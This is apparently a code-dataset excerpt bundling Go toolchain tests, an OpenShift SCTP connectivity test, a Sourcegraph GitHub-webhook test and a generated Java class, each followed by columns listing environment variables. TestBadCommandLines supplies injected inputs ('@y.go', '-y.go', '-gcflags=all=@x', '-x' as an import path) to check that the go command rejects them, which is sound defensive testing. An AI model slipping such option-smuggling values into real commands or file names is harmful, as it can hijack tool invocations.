p1 := strings.TrimSpace(tg.getStdout())
tg.run("list", "-f={{.Target}}", "p2")
p2 := strings.TrimSpace(tg.getStdout())
tg.run("list", "-f={{.Target}}", "main1")
main1 := strings.TrimSpace(tg.getStdout())
tg.run("install", "main1")
tg.mustExist(main1)
tg.mustNotExist(p2)
tg.mustNotExist(p1)
tg.run("install", "p2")
tg.mustExist(p2)
tg.mustNotExist(p1)
// don't let install -i overwrite runtime
tg.wantNotStale("runtime", "", "must be non-stale before install -i")
tg.run("install", "-i", "main1")
tg.mustExist(p1)
tg.must(os.Remove(p1))
tg.run("install", "-i", "p2")
tg.mustExist(p1)
}
// Issue 22986.
func TestImportPath(t *testing.T) {
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("src/a/a.go", `
package main
import (
"log"
p "a/p-1.0"
)
func main() {
if !p.V {
log.Fatal("false")
}
}`)
tg.tempFile("src/a/a_test.go", `
package main_test
import (
p "a/p-1.0"
"testing"
)
func TestV(t *testing.T) {
if !p.V {
t.Fatal("false")
}
}`)
tg.tempFile("src/a/p-1.0/p.go", `
package p
var V = true
func init() {}
`)
tg.setenv("GOPATH", tg.path("."))
tg.run("build", "-o", tg.path("a.exe"), "a")
tg.run("test", "a")
}
func TestBadCommandLines(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("src/x/x.go", "package x\n")
tg.setenv("GOPATH", tg.path("."))
tg.run("build", "x")
tg.tempFile("src/x/@y.go", "package x\n")
tg.runFail("build", "x")
tg.grepStderr("invalid input file name \"@y.go\"", "did not reject @y.go")
tg.must(os.Remove(tg.path("src/x/@y.go")))
tg.tempFile("src/x/-y.go", "package x\n")
tg.runFail("build", "x")
tg.grepStderr("invalid input file name \"-y.go\"", "did not reject -y.go")
tg.must(os.Remove(tg.path("src/x/-y.go")))
if runtime.Compiler == "gccgo" {
tg.runFail("build", "-gccgoflags=all=@x", "x")
} else {
tg.runFail("build", "-gcflags=all=@x", "x")
}
tg.grepStderr("invalid command-line argument @x in command", "did not reject @x during exec")
tg.tempFile("src/@x/x.go", "package x\n")
tg.setenv("GOPATH", tg.path("."))
tg.runFail("build", "@x")
tg.grepStderr("invalid input directory name \"@x\"|can only use path@version syntax with 'go get' and 'go install' in module-aware mode", "did not reject @x directory")
tg.tempFile("src/@x/y/y.go", "package y\n")
tg.setenv("GOPATH", tg.path("."))
tg.runFail("build", "@x/y")
tg.grepStderr("invalid import path \"@x/y\"|can only use path@version syntax with 'go get' and 'go install' in module-aware mode", "did not reject @x/y import path")
tg.tempFile("src/-x/x.go", "package x\n")
tg.setenv("GOPATH", tg.path("."))
tg.runFail("build", "--", "-x")
tg.grepStderr("invalid import path \"-x\"", "did not reject -x import path")
tg.tempFile("src/-x/y/y.go", "package y\n")
tg.setenv("GOPATH", tg.path("."))
tg.runFail("build", "--", "-x/y")
tg.grepStderr("invalid import path \"-x/y\"", "did not reject -x/y import path")
}
func TestTwoPkgConfigs(t *testing.T) {
if !canCgo {
t.Skip("no cgo")
}
if runtime.GOOS == "windows" || runtime.GOOS == "plan9" {
t.Skipf("no shell scripts on %s", runtime.GOOS)
}
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("src/x/a.go", `package x
// #cgo pkg-config: --static a
import "C"
`)
tg.tempFile("src/x/b.go", `package x
// #cgo pkg-config: --static a
import "C"
`)
tg.tempFile("pkg-config.sh", `#!/bin/sh
echo $* >>`+tg.path("pkg-config.out"))
tg.must(os.Chmod(tg.path("pkg-config.sh"), 0755))
tg.setenv("GOPATH", tg.path("."))
tg.setenv("PKG_CONFIG", tg.path("pkg-config.sh"))
tg.run("build", "x")
out, err := os.ReadFile(tg.path("pkg-config.out"))
tg.must(err)
out = bytes.TrimSpace(out)
want := "--cflags --static --static -- a a\n--libs --static --static -- a a"
if !bytes.Equal(out, []byte(want)) {
t.Errorf("got %q want %q", out, want)
}
}
func TestCgoCache(t *testing.T) {
if !canCgo {
t.Skip("no cgo")
}
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("src/x/a.go", `package main
// #ifndef VAL
// #define VAL 0
// #endif
// int val = VAL;
import "C"
import "fmt"
func main() { fmt.Println(C.val) }
`)
tg.setenv("GOPATH", tg.path("."))
exe := tg.path("x.exe")
tg.run("build", "-o", exe, "x")
tg.setenv("CGO_LDFLAGS", "-lnosuchlibraryexists")
tg.runFail("build", "-o", exe, "x")
tg.grepStderr(`nosuchlibraryexists`, "did not run linker with changed CGO_LDFLAGS")
}
// Issue 23982
func TestFilepathUnderCwdFormat(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.run("test", "-x", "-cover", "log")
tg.grepStderrNot(`\.log\.cover\.go`, "-x output should contain correctly formatted filepath under cwd")
}
// Issue 24396.
func TestDontReportRemoveOfEmptyDir(t *testing.T) {
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("src/a/a.go", `package a`)
tg.setenv("GOPATH", tg.path("."))
tg.run("install", "-x", "a")
tg.run("install", "-x", "a")
// The second install should have printed only a WORK= line,
// nothing else.
if bytes.Count(tg.stdout.Bytes(), []byte{'\n'})+bytes.Count(tg.stderr.Bytes(), []byte{'\n'}) > 1 {
t.Error("unnecessary output when installing installed package")
}
}
// Issue 24704.
func TestLinkerTmpDirIsDeleted(t *testing.T) {
skipIfGccgo(t, "gccgo does not use cmd/link")
if !canCgo {
t.Skip("skipping because cgo not enabled")
}
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("a.go", `package main; import "C"; func main() {}`)
tg.run("build", "-ldflags", "-v", "-o", os.DevNull, tg.path("a.go"))
// Find line that has "host link:" in linker output.
stderr := tg.getStderr()
var hostLinkLine string
for _, line := range strings.Split(stderr, "\n") {
if !strings.Contains(line, "host link:") {
continue
}
hostLinkLine = line
break
}
if hostLinkLine == "" {
t.Fatal(`fail to find with "host link:" string in linker output`)
}
// Find parameter, like "/tmp/go-link-408556474/go.o" inside of
// "host link:" line, and extract temp directory /tmp/go-link-408556474
// out of it.
tmpdir := hostLinkLine
i := strings.Index(tmpdir, `go.o"`)
if i == -1 {
t.Fatalf(`fail to find "go.o" in "host link:" line %q`, hostLinkLine)
}
tmpdir = tmpdir[:i-1]
i = strings.LastIndex(tmpdir, `"`)
if i == -1 {
t.Fatalf(`fail to find " in "host link:" line %q`, hostLinkLine)
}
tmpdir = tmpdir[i+1:]
// Verify that temp directory has been removed.
_, err := os.Stat(tmpdir)
if err == nil {
t.Fatalf("temp directory %q has not been removed", tmpdir)
}
if !os.IsNotExist(err) {
t.Fatalf("Stat(%q) returns unexpected error: %v", tmpdir, err)
}
}
// Issue 25093.
func TestCoverpkgTestOnly(t *testing.T) {
skipIfGccgo(t, "gccgo has no cover tool")
tooSlow(t)
tg := testgo(t)
defer tg.cleanup()
tg.parallel()
tg.tempFile("src/a/a.go", `package a
func F(i int) int {
return i*i
}`)
tg.tempFile("src/atest/a_test.go", `
package a_test
import ( "a"; "testing" )
func TestF(t *testing.T) { a.F(2) }
`)
tg.setenv("GOPATH", tg.path("."))
tg.run("test", "-coverpkg=a", "atest")
tg.grepStderrNot("no packages being tested depend on matches", "bad match message")
tg.grepStdout("coverage: 100", "no coverage")
}
// Regression test for golang.org/issue/34499: version command should not crash
// when executed in a deleted directory on Linux.
func TestExecInDeletedDir(t *testing.T) {
switch runtime.GOOS {
case "windows", "plan9",
"aix", // Fails with "device busy".
"solaris", "illumos": // Fails with "invalid argument".
t.Skipf("%v does not support removing the current working directory", runtime.GOOS)
}
tg := testgo(t)
defer tg.cleanup()
wd, err := os.Getwd()
tg.check(err)
tg.makeTempdir()
tg.check(os.Chdir(tg.tempdir))
defer func() { tg.check(os.Chdir(wd)) }()
tg.check(os.Remove(tg.tempdir))
// `go version` should not fail
tg.run("version")
}
// A missing C compiler should not force the net package to be stale.
// Issue 47215.
func TestMissingCC(t *testing.T) {
if !canCgo {
t.Skip("test is only meaningful on systems with cgo")
}
cc := os.Getenv("CC")
if cc == "" {
cc = "gcc"
}
if filepath.IsAbs(cc) {
t.Skipf(`"CC" (%s) is an absolute path`, cc)
}
_, err := exec.LookPath(cc)
if err != nil {
t.Skipf(`"CC" (%s) not on PATH`, cc)
}
tg := testgo(t)
defer tg.cleanup()
netStale, _ := tg.isStale("net")
if netStale {
t.Skip(`skipping test because "net" package is currently stale`)
}
tg.setenv("PATH", "") // No C compiler on PATH.
netStale, _ = tg.isStale("net")
if netStale {
t.Error(`clearing "PATH" causes "net" to be stale`)
}
}
| [
"\"GO_GCFLAGS\"",
"\"PATH\"",
"\"GOPATH\"",
"\"GODEBUG\"",
"\"GODEBUG\"",
"\"GODEBUG\"",
"\"GODEBUG\"",
"\"GODEBUG\"",
"\"CC\""
]
| []
| [
"GO_GCFLAGS",
"CC",
"GOPATH",
"GODEBUG",
"PATH"
]
| [] | ["GO_GCFLAGS", "CC", "GOPATH", "GODEBUG", "PATH"] | go | 5 | 0 | |
functests/sctp/sctp.go | package sctp
import (
"fmt"
"io/ioutil"
"os"
"strings"
"time"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
mcfgv1 "github.com/openshift/machine-config-operator/pkg/apis/machineconfiguration.openshift.io/v1"
mcfgScheme "github.com/openshift/machine-config-operator/pkg/generated/clientset/versioned/scheme"
k8sv1 "k8s.io/api/core/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/util/intstr"
"github.com/openshift-kni/cnf-features-deploy/functests/utils/client"
"github.com/openshift-kni/cnf-features-deploy/functests/utils/execute"
"github.com/openshift-kni/cnf-features-deploy/functests/utils/namespaces"
"k8s.io/utils/pointer"
)
const mcYaml = "../sctp/sctp_module_mc.yaml"
const hostnameLabel = "kubernetes.io/hostname"
const testNamespace = "sctptest"
var (
testerImage string
sctpNodeSelector string
)
func init() {
testerImage = os.Getenv("SCTPTEST_IMAGE")
if testerImage == "" {
testerImage = "quay.io/fpaoline/sctptester:v1.0"
}
sctpNodeSelector = os.Getenv("SCTPTEST_NODE_SELECTOR")
if sctpNodeSelector == "" {
sctpNodeSelector = "node-role.kubernetes.io/worker-cnf="
}
}
var _ = Describe("sctp", func() {
execute.BeforeAll(func() {
err := namespaces.Create(testNamespace, client.Client)
Expect(err).ToNot(HaveOccurred())
err = namespaces.Clean(testNamespace, client.Client)
Expect(err).ToNot(HaveOccurred())
})
var _ = Describe("sctp setup", func() {
var clientNode string
var serverNode string
var _ = Describe("Negative - Sctp disabled", func() {
execute.BeforeAll(func() {
By("Validate that SCTP present of cluster.")
checkForSctpReady(client.Client)
})
BeforeEach(func() {
By("Choosing the nodes for the server and the client")
nodes, err := client.Client.Nodes().List(metav1.ListOptions{
LabelSelector: "node-role.kubernetes.io/worker,!" + strings.Replace(sctpNodeSelector, "=", "", -1),
})
Expect(err).ToNot(HaveOccurred())
Expect(len(nodes.Items)).To(BeNumerically(">", 0))
clientNode = nodes.Items[0].ObjectMeta.Labels[hostnameLabel]
serverNode = nodes.Items[0].ObjectMeta.Labels[hostnameLabel]
if len(nodes.Items) > 1 {
serverNode = nodes.Items[1].ObjectMeta.Labels[hostnameLabel]
}
createSctpService(client.Client)
})
Context("Client Server Connection", func() {
// OCP-26995
It("Should NOT connect a client pod to a server pod", func() {
By("Starting the server")
serverArgs := []string{"-ip", "0.0.0.0", "-port", "30101", "-server"}
pod := scptTestPod("scptserver", serverNode, "sctpserver", serverArgs)
pod.Spec.Containers[0].Ports = []k8sv1.ContainerPort{
k8sv1.ContainerPort{
Name: "sctpport",
Protocol: k8sv1.ProtocolSCTP,
ContainerPort: 30101,
},
}
serverPod, err := client.Client.Pods(testNamespace).Create(pod)
Expect(err).ToNot(HaveOccurred())
By("Fetching the server's ip address")
Eventually(func() k8sv1.PodPhase {
runningPod, err := client.Client.Pods(testNamespace).Get(serverPod.Name, metav1.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return runningPod.Status.Phase
}, 1*time.Minute, 1*time.Second).Should(Equal(k8sv1.PodFailed))
})
AfterEach(func() {
namespaces.Clean("sctptest", client.Client)
deleteService(client.Client)
})
})
})
var _ = Describe("Test Connectivity", func() {
var activeService *k8sv1.Service
var runningPod *k8sv1.Pod
var serverPod *k8sv1.Pod
var nodes *k8sv1.NodeList
var err error
execute.BeforeAll(func() {
checkForSctpReady(client.Client)
})
BeforeEach(func() {
By("Choosing the nodes for the server and the client")
nodes, err = client.Client.Nodes().List(metav1.ListOptions{
LabelSelector: sctpNodeSelector,
})
Expect(err).ToNot(HaveOccurred())
Expect(len(nodes.Items)).To(BeNumerically(">", 0))
clientNode = nodes.Items[0].ObjectMeta.Labels[hostnameLabel]
serverNode = nodes.Items[0].ObjectMeta.Labels[hostnameLabel]
if len(nodes.Items) > 1 {
serverNode = nodes.Items[1].ObjectMeta.Labels[hostnameLabel]
}
activeService = createSctpService(client.Client)
By("Starting the server")
serverArgs := []string{"-ip", "0.0.0.0", "-port", "30101", "-server"}
pod := scptTestPod("scptserver", serverNode, "sctpserver", serverArgs)
pod.Spec.Containers[0].Ports = []k8sv1.ContainerPort{
k8sv1.ContainerPort{
Name: "sctpport",
Protocol: k8sv1.ProtocolSCTP,
ContainerPort: 30101,
},
}
serverPod, err = client.Client.Pods(testNamespace).Create(pod)
Expect(err).ToNot(HaveOccurred())
By("Fetching the server's ip address")
Eventually(func() k8sv1.PodPhase {
runningPod, err = client.Client.Pods(testNamespace).Get(serverPod.Name, metav1.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return runningPod.Status.Phase
}, 3*time.Minute, 1*time.Second).Should(Equal(k8sv1.PodRunning))
})
Context("Client Server Connection", func() {
// OCP-26759
It("Kernel Module is loaded", func() {
checkForSctpReady(client.Client)
})
// OCP-26760
It("Should connect a client pod to a server pod", func() {
testClientServerConnection(client.Client, runningPod.Status.PodIP,
activeService.Spec.Ports[0].Port, clientNode, serverPod.Name)
})
// OCP-26763
It("Should connect a client pod to a server pod. Feature LatencySensitive Active", func() {
fg, err := client.Client.FeatureGates().Get("cluster", metav1.GetOptions{})
Expect(err).ToNot(HaveOccurred())
if fg.Spec.FeatureSet == "LatencySensitive" {
testClientServerConnection(client.Client, runningPod.Status.PodIP,
activeService.Spec.Ports[0].Port, clientNode, serverPod.Name)
} else {
Skip("Feature LatencySensitive is not ACTIVE")
}
})
// OCP-26761
It("Should connect a client pod to a server pod via Service ClusterIP", func() {
testClientServerConnection(client.Client, activeService.Spec.ClusterIP,
activeService.Spec.Ports[0].Port, clientNode, serverPod.Name)
})
// OCP-26762
It("Should connect a client pod to a server pod via Service NodeIP", func() {
testClientServerConnection(client.Client, nodes.Items[0].Status.Addresses[0].Address,
activeService.Spec.Ports[0].Port, clientNode, serverPod.Name)
})
})
AfterEach(func() {
deleteService(client.Client)
namespaces.Clean("sctptest", client.Client)
})
})
})
})
func loadMC() *mcfgv1.MachineConfig {
decode := mcfgScheme.Codecs.UniversalDeserializer().Decode
mcoyaml, err := ioutil.ReadFile(mcYaml)
Expect(err).ToNot(HaveOccurred())
obj, _, err := decode([]byte(mcoyaml), nil, nil)
Expect(err).ToNot(HaveOccurred())
mc, ok := obj.(*mcfgv1.MachineConfig)
Expect(ok).To(Equal(true))
return mc
}
func checkForSctpReady(cs *client.ClientSet) {
nodes, err := cs.Nodes().List(metav1.ListOptions{
LabelSelector: sctpNodeSelector,
})
Expect(err).ToNot(HaveOccurred())
Expect(len(nodes.Items)).To(BeNumerically(">", 0))
args := []string{`set -x; x="$(checksctp 2>&1)"; echo "$x" ; if [ "$x" = "SCTP supported" ]; then echo "succeeded"; exit 0; else echo "failed"; exit 1; fi`}
for _, n := range nodes.Items {
job := jobForNode("checksctp", n.ObjectMeta.Labels[hostnameLabel], "checksctp", []string{"/bin/bash", "-c"}, args)
cs.Pods(testNamespace).Create(job)
}
Eventually(func() bool {
pods, err := cs.Pods(testNamespace).List(metav1.ListOptions{LabelSelector: "app=checksctp"})
ExpectWithOffset(1, err).ToNot(HaveOccurred())
for _, p := range pods.Items {
if p.Status.Phase != k8sv1.PodSucceeded {
return false
}
}
return true
}, 3*time.Minute, 10*time.Second).Should(Equal(true))
}
func testClientServerConnection(cs *client.ClientSet, destIP string, port int32, clientNode string, serverPodName string) {
By("Connecting a client to the server")
clientArgs := []string{"-ip", destIP, "-port",
fmt.Sprint(port), "-lport", "30102"}
clientPod := scptTestPod("sctpclient", clientNode, "sctpclient", clientArgs)
cs.Pods(testNamespace).Create(clientPod)
Eventually(func() k8sv1.PodPhase {
pod, err := cs.Pods(testNamespace).Get(serverPodName, metav1.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return pod.Status.Phase
}, 1*time.Minute, 1*time.Second).Should(Equal(k8sv1.PodSucceeded))
}
func createSctpService(cs *client.ClientSet) *k8sv1.Service {
service := k8sv1.Service{
ObjectMeta: metav1.ObjectMeta{
Name: "sctpservice",
Namespace: testNamespace,
},
Spec: k8sv1.ServiceSpec{
Selector: map[string]string{
"app": "sctpserver",
},
Ports: []k8sv1.ServicePort{
k8sv1.ServicePort{
Protocol: k8sv1.ProtocolSCTP,
Port: 30101,
NodePort: 30101,
TargetPort: intstr.IntOrString{
Type: intstr.Int,
IntVal: 30101,
},
},
},
Type: "NodePort",
},
}
activeService, err := cs.Services(testNamespace).Create(&service)
Expect(err).ToNot(HaveOccurred())
return activeService
}
func deleteService(cs *client.ClientSet) {
err := cs.Services(testNamespace).Delete("sctpservice", &metav1.DeleteOptions{
GracePeriodSeconds: pointer.Int64Ptr(0)})
Expect(err).ToNot(HaveOccurred())
}
func scptTestPod(name, node, app string, args []string) *k8sv1.Pod {
res := k8sv1.Pod{
ObjectMeta: metav1.ObjectMeta{
GenerateName: name,
Labels: map[string]string{
"app": app,
},
Namespace: testNamespace,
},
Spec: k8sv1.PodSpec{
RestartPolicy: k8sv1.RestartPolicyNever,
Containers: []k8sv1.Container{
{
Name: name,
Image: testerImage,
Command: []string{"/usr/bin/sctptest"},
Args: args,
},
},
NodeSelector: map[string]string{
hostnameLabel: node,
},
},
}
return &res
}
func jobForNode(name, node, app string, cmd []string, args []string) *k8sv1.Pod {
job := k8sv1.Pod{
ObjectMeta: metav1.ObjectMeta{
GenerateName: name,
Labels: map[string]string{
"app": app,
},
Namespace: testNamespace,
},
Spec: k8sv1.PodSpec{
RestartPolicy: k8sv1.RestartPolicyNever,
Containers: []k8sv1.Container{
{
Name: name,
Image: testerImage,
Command: cmd,
Args: args,
},
},
NodeSelector: map[string]string{
hostnameLabel: node,
},
},
}
return &job
}
| [
"\"SCTPTEST_IMAGE\"",
"\"SCTPTEST_NODE_SELECTOR\""
]
| []
| [
"SCTPTEST_NODE_SELECTOR",
"SCTPTEST_IMAGE"
]
| [] | ["SCTPTEST_NODE_SELECTOR", "SCTPTEST_IMAGE"] | go | 2 | 0 | |
enterprise/internal/campaigns/webhooks_test.go | package campaigns
import (
"bytes"
"context"
"crypto/hmac"
"crypto/sha256"
"database/sql"
"encoding/hex"
"encoding/json"
"flag"
"io/ioutil"
"net/http"
"net/http/httptest"
"net/http/httputil"
"os"
"path/filepath"
"strings"
"testing"
"time"
"github.com/dnaeon/go-vcr/cassette"
"github.com/google/go-cmp/cmp"
gh "github.com/google/go-github/github"
"github.com/sourcegraph/sourcegraph/cmd/repo-updater/repos"
"github.com/sourcegraph/sourcegraph/internal/campaigns"
"github.com/sourcegraph/sourcegraph/internal/extsvc/github"
"github.com/sourcegraph/sourcegraph/internal/httpcli"
"github.com/sourcegraph/sourcegraph/internal/httptestutil"
"github.com/sourcegraph/sourcegraph/internal/rcache"
"github.com/sourcegraph/sourcegraph/schema"
)
var update = flag.Bool("update", false, "update testdata")
// Ran in integration_test.go
func testGitHubWebhook(db *sql.DB) func(*testing.T) {
return func(t *testing.T) {
now := time.Now()
clock := func() time.Time {
return now.UTC().Truncate(time.Microsecond)
}
now = clock()
ctx := context.Background()
rcache.SetupForTest(t)
cf, save := newGithubClientFactory(t, "github-webhooks")
defer save()
var userID int32
err := db.QueryRow("INSERT INTO users (username) VALUES ('admin') RETURNING id").Scan(&userID)
if err != nil {
t.Fatal(err)
}
secret := "secret"
repoStore := repos.NewDBStore(db, sql.TxOptions{})
githubExtSvc := &repos.ExternalService{
Kind: "GITHUB",
DisplayName: "GitHub",
Config: marshalJSON(t, &schema.GitHubConnection{
Url: "https://github.com",
Token: os.Getenv("GITHUB_TOKEN"),
Repos: []string{"oklog/ulid"},
Webhooks: []*schema.GitHubWebhook{{Org: "oklog", Secret: secret}},
}),
}
err = repoStore.UpsertExternalServices(ctx, githubExtSvc)
if err != nil {
t.Fatal(t)
}
githubSrc, err := repos.NewGithubSource(githubExtSvc, cf)
if err != nil {
t.Fatal(t)
}
githubRepo, err := githubSrc.GetRepo(ctx, "oklog/ulid")
if err != nil {
t.Fatal(err)
}
err = repoStore.UpsertRepos(ctx, githubRepo)
if err != nil {
t.Fatal(err)
}
store := NewStoreWithClock(db, clock)
campaign := &campaigns.Campaign{
Name: "Test campaign",
Description: "Testing THE WEBHOOKS",
AuthorID: userID,
NamespaceUserID: userID,
}
err = store.CreateCampaign(ctx, campaign)
if err != nil {
t.Fatal(err)
}
changesets := []*campaigns.Changeset{
{
RepoID: githubRepo.ID,
ExternalID: "16",
ExternalServiceType: githubRepo.ExternalRepo.ServiceType,
CampaignIDs: []int64{campaign.ID},
},
}
err = store.CreateChangesets(ctx, changesets...)
if err != nil {
t.Fatal(err)
}
syncer := ChangesetSyncer{
ReposStore: repoStore,
Store: store,
HTTPFactory: cf,
}
err = syncer.SyncChangesets(ctx, changesets...)
if err != nil {
t.Fatal(err)
}
_, err = db.Exec("DELETE FROM changeset_events")
if err != nil {
t.Fatal(err)
}
fs := loadFixtures(t)
hook := NewGitHubWebhook(store, repoStore, clock)
issueComment := github.IssueComment{
DatabaseID: 540540777,
Author: github.Actor{
AvatarURL: "https://avatars2.githubusercontent.com/u/67471?v=4",
Login: "tsenart",
URL: "https://api.github.com/users/tsenart",
},
Editor: &github.Actor{
AvatarURL: "https://avatars2.githubusercontent.com/u/67471?v=4",
Login: "tsenart",
URL: "https://api.github.com/users/tsenart",
},
AuthorAssociation: "CONTRIBUTOR",
Body: "A comment on an old event. Aaaand it was updated. Twice. Thrice. Four times even.",
URL: "https://api.github.com/repos/oklog/ulid/issues/comments/540540777",
CreatedAt: parseTimestamp(t, "2019-10-10T12:06:54Z"),
UpdatedAt: parseTimestamp(t, "2019-10-10T12:15:20Z"),
IncludesCreatedEdit: true,
}
events := []*campaigns.ChangesetEvent{
{
ID: 7,
ChangesetID: changesets[0].ID,
Kind: campaigns.ChangesetEventKindGitHubCommented,
Key: "540540777",
CreatedAt: now,
UpdatedAt: now,
Metadata: func() interface{} {
m := issueComment
return &m
}(),
},
}
for _, tc := range []struct {
name string
secret string
event event
code int
want []*campaigns.ChangesetEvent
}{
{
name: "unauthorized",
secret: "wrong-secret",
event: fs["issue_comment-edited"],
code: http.StatusUnauthorized,
want: []*campaigns.ChangesetEvent{},
},
{
name: "non-existent-changeset",
secret: secret,
event: func() event {
e := fs["issue_comment-edited"]
clone := *(e.event.(*gh.IssueCommentEvent))
issue := *clone.Issue
clone.Issue = &issue
nonExistingPRNumber := 999999
issue.Number = &nonExistingPRNumber
return event{name: e.name, event: &clone}
}(),
code: http.StatusOK,
want: []*campaigns.ChangesetEvent{},
},
{
name: "non-existent-changeset-event",
secret: secret,
event: fs["issue_comment-edited"],
code: http.StatusOK,
want: events,
},
{
name: "existent-changeset-event",
secret: secret,
event: func() event {
e := fs["issue_comment-edited"]
clone := *(e.event.(*gh.IssueCommentEvent))
comment := *clone.Comment
clone.Comment = &comment
body := "Foo bar"
comment.Body = &body
return event{name: e.name, event: &clone}
}(),
code: http.StatusOK,
want: func() []*campaigns.ChangesetEvent {
m := issueComment
m.Body = "Foo bar"
e := events[0].Clone()
e.Metadata = &m
return []*campaigns.ChangesetEvent{e}
}(),
},
} {
tc := tc
t.Run(tc.name, func(t *testing.T) {
body, err := json.Marshal(tc.event.event)
if err != nil {
t.Fatal(err)
}
req, err := http.NewRequest("POST", "", bytes.NewReader(body))
if err != nil {
t.Fatal(err)
}
req.Header.Set("X-Github-Event", tc.event.name)
req.Header.Set("X-Hub-Signature", sign(t, body, []byte(tc.secret)))
rec := httptest.NewRecorder()
hook.ServeHTTP(rec, req)
resp := rec.Result()
if tc.code != 0 && tc.code != resp.StatusCode {
bs, err := httputil.DumpResponse(resp, true)
if err != nil {
t.Fatal(err)
}
t.Log(string(bs))
t.Errorf("have status code %d, want %d", resp.StatusCode, tc.code)
}
have, _, err := store.ListChangesetEvents(ctx, ListChangesetEventsOpts{Limit: 1000})
if err != nil {
t.Fatal(err)
}
if diff := cmp.Diff(have, tc.want); diff != "" {
t.Error(diff)
}
})
}
}
}
type event struct {
name string
event interface{}
}
func loadFixtures(t testing.TB) map[string]event {
t.Helper()
matches, err := filepath.Glob("testdata/fixtures/*")
if err != nil {
t.Fatal(err)
}
fs := make(map[string]event, len(matches))
for _, m := range matches {
bs, err := ioutil.ReadFile(m)
if err != nil {
t.Fatal(err)
}
base := filepath.Base(m)
name := strings.TrimSuffix(base, filepath.Ext(base))
parts := strings.SplitN(name, "-", 2)
if len(parts) != 2 {
t.Fatalf("unexpected fixture file name format: %s", m)
}
ev, err := gh.ParseWebHook(parts[0], bs)
if err != nil {
t.Fatal(err)
}
fs[name] = event{name: parts[0], event: ev}
}
return fs
}
func sign(t *testing.T, message, secret []byte) string {
t.Helper()
mac := hmac.New(sha256.New, secret)
_, err := mac.Write(message)
if err != nil {
t.Fatalf("writing hmac message failed: %s", err)
}
return "sha256=" + hex.EncodeToString(mac.Sum(nil))
}
func marshalJSON(t testing.TB, v interface{}) string {
t.Helper()
bs, err := json.Marshal(v)
if err != nil {
t.Fatal(err)
}
return string(bs)
}
func newGithubClientFactory(t testing.TB, name string) (*httpcli.Factory, func()) {
t.Helper()
cassete := filepath.Join("testdata/vcr/", strings.Replace(name, " ", "-", -1))
rec, err := httptestutil.NewRecorder(cassete, *update, func(i *cassette.Interaction) error {
return nil
})
if err != nil {
t.Fatal(err)
}
mw := httpcli.NewMiddleware(githubProxyRedirectMiddleware)
hc := httpcli.NewFactory(mw, httptestutil.NewRecorderOpt(rec))
return hc, func() {
if err := rec.Stop(); err != nil {
t.Errorf("failed to update test data: %s", err)
}
}
}
func githubProxyRedirectMiddleware(cli httpcli.Doer) httpcli.Doer {
return httpcli.DoerFunc(func(req *http.Request) (*http.Response, error) {
if req.URL.Hostname() == "github-proxy" {
req.URL.Host = "api.github.com"
req.URL.Scheme = "https"
}
return cli.Do(req)
})
}
func parseTimestamp(t testing.TB, ts string) time.Time {
t.Helper()
timestamp, err := time.Parse(time.RFC3339, ts)
if err != nil {
t.Fatal(err)
}
return timestamp
}
| [
"\"GITHUB_TOKEN\""
]
| []
| [
"GITHUB_TOKEN"
]
| [] | ["GITHUB_TOKEN"] | go | 1 | 0 | |
src/com.mentor.nucleus.bp.core/src/com/mentor/nucleus/bp/core/DescriptionEngine_c.java | package com.mentor.nucleus.bp.core;
//====================================================================
//
// File: com.mentor.nucleus.bp.core.DescriptionEngine_c.java
//
// WARNING: Do not edit this generated file
// Generated by ../MC-Java/java.arc, $Revision: 1.111 $
//
// (c) Copyright 2005-2014 by Mentor Graphics Corp. All rights reserved.
//
//====================================================================
// No special imports
import java.util.*;
import java.lang.reflect.*;
import org.eclipse.core.resources.IFile;
import org.eclipse.core.resources.IResource;
import org.eclipse.core.runtime.IAdaptable;
import org.eclipse.core.runtime.IPath;
import org.eclipse.core.runtime.Path;
import com.mentor.nucleus.bp.core.util.PersistenceUtil;
import org.eclipse.core.runtime.NullProgressMonitor;
import com.mentor.nucleus.bp.core.ui.marker.UmlProblem;
import com.mentor.nucleus.bp.core.common.*;
abstract class EV_DESCRIPTION_ENGINE extends genericEvent_c {
public abstract int getEvtcode();
}
public class DescriptionEngine_c extends NonRootModelElement
implements
IAdaptable,
Cloneable {
// Public Constructors
public DescriptionEngine_c(ModelRoot modelRoot, java.util.UUID p_m_id) {
super(modelRoot);
//pre-process the uuid so that we re-use null uuid instance rather then creating a new one.
m_id = IdAssigner.preprocessUUID(p_m_id);
Object[] key = {m_id};
addInstanceToMap(key);
}
static public DescriptionEngine_c createProxy(ModelRoot modelRoot,
java.util.UUID p_m_id, String p_contentPath, IPath p_localPath) {
ModelRoot resolvedModelRoot = ModelRoot.findModelRoot(modelRoot,
p_contentPath, p_localPath);
// if a model root was not resolved it is most likely
// due to a missing file of the proxy, defualt back to
// the original model root
if (resolvedModelRoot != null)
modelRoot = resolvedModelRoot;
InstanceList instances = modelRoot
.getInstanceList(DescriptionEngine_c.class);
DescriptionEngine_c new_inst = null;
synchronized (instances) {
Object[] key = {p_m_id};
new_inst = (DescriptionEngine_c) instances.get(key);
}
String contentPath = PersistenceUtil.resolveRelativePath(p_localPath,
new Path(p_contentPath));
if (modelRoot.isNewCompareRoot()) {
// for comparisons we do not want to change
// the content path
contentPath = p_contentPath;
}
if (new_inst != null && !modelRoot.isCompareRoot()) {
PersistableModelComponent pmc = new_inst.getPersistableComponent();
if (pmc == null) {
// dangling reference, redo this instance
new_inst.batchUnrelate();
//pre-process the uuid so that we re-use null uuid instance rather then creating a new one.
new_inst.m_id = IdAssigner.preprocessUUID(p_m_id);
}
}
if (new_inst == null) {
// there is no instance matching the id, create a proxy
// if the resource doesn't exist then this will be a dangling reference
new_inst = new DescriptionEngine_c(modelRoot, p_m_id);
new_inst.m_contentPath = contentPath;
}
return new_inst;
}
